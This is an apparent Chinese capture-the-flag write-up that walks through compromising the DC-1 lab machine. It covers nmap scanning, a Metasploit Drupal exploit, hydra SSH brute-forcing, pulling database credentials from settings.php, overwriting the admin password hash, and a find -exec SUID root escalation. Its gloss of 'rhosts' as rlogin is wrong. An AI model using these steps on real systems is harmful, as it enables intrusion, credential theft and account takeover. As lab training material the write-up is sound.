DC-1靶机

因为DC-1的账号和密码还不知道，所以不能查看DC-1的IP地址，那么我们将通过kali来扫描到DC-1的IP地址。

1.查看mac地址

通过查看mac地址来确定靶机的ip

arp-scan -l :查看当前局域网的所有设备

 靶机的mac地址

通过对比，找到ip地址：10.9.136.84

 登陆网页

2.扫描Ip

   nmap -A 10.9.136.84
   找到两个开放端口

3.继续扫描漏洞

(1)使用工具扫描

使用wappalyser查找到cms漏洞,使用方法查看下方链接

https://baijiahao.baidu.com/s?id=1743442958112311700&wfr=spider&for=pchttps://baijiahao.baidu.com/s?id=1743442958112311700&wfr=spider&for=pc

(2)使用msf攻击漏洞

启动msf的数据库

msfdb start

启动msfconsole

搜索 search Drupal

使用第二个漏洞: use 2

 

 使用show missing查看一下必须要设置的选项
rhosts含义:远程登录（rlogin）是一个 UNIX 命令，它允许授权用户进入网络中的其它 UNIX 机器并且就像用户在现场操作一样。一旦进入主机，用户可以操作主机允许的任何事情，比如：读文件、编辑文件或删除文件等。

需要设置rhosts,rhosts就是设置靶机的IP地址

使用set设置

set rhosts 10.9.136.84

使用show options 可以查看设置好的信息

确定设置的信息没问题

输入run开始执行攻击，成功

 查看里面的信息：ls
flag1
ls可以看到第一个flag1.txt

第一个falg找到，查看：cat flag1.txt

 

查看一下靶机的用户，发现有个flag4的用户

cat /etc/passwd

找到flag4

 

使用hydra来爆破一波看看是否能拿到密码

hydra -l flag4 -P /usr/share/john/password.lst 10.9.136.84 ssh

可以得到flag4的密码为orange

 

使用ssh连接靶机
ssh [email protected]

 

ls在flag4账户的目录下找到了falg4，可想而知还有在前面还有两个flag，可能在web上，因为web有账号

 

既然已经登录进靶机了，那么我们就去查看一下web的配置文件

进度入到var/www的目录下

在百度上可以找到drupal的配置文件是/var/www/sites/default/settings.php

使用命令查看一下

cat sites/default/settings.php

在配置文件中看到了flag2还有数据库的信息
'username' => 'dbuser',
'password' => 'R0ck3t',

 

使用命令连接数据库

mysql -u dbuser -p

连接成功

 

查看数据库：show databases;

 

使用数据表use drupaldb

 

查看表：show tables;

 

 

使用命令查看一下

select * from users;

可以看到管理员的账户，但是先要搞hash值，有点难

quit退出数据库连接

搜索一下passwd

find / -name password*

 

可以看到var/www/scripts下有个sh的脚本

直接执行试试

 

可以设置密码，尝试一下后面加上密码

scripts/password-hash.sh 123456

 

得到一个哈希值，那么我们可以将这个哈希值替换到数据库admin得账号下

修改数据库中admin的哈希值

update users set pass='$S$DvaDIRP8Hxz93/2ZLLeQrczm5gK1BR6KrJX2JmOGPB7boVeFE3wa' where name='admin';

 

修改成功尝试去web界面登录试试

 

找到了flag3 

 

 找到flag3后，继续对falg4提权 

 

提权

find -name flag4.txt -exec /bin/bash -p \;

进入root权限，查看内容

 

cat thefinalflag.txt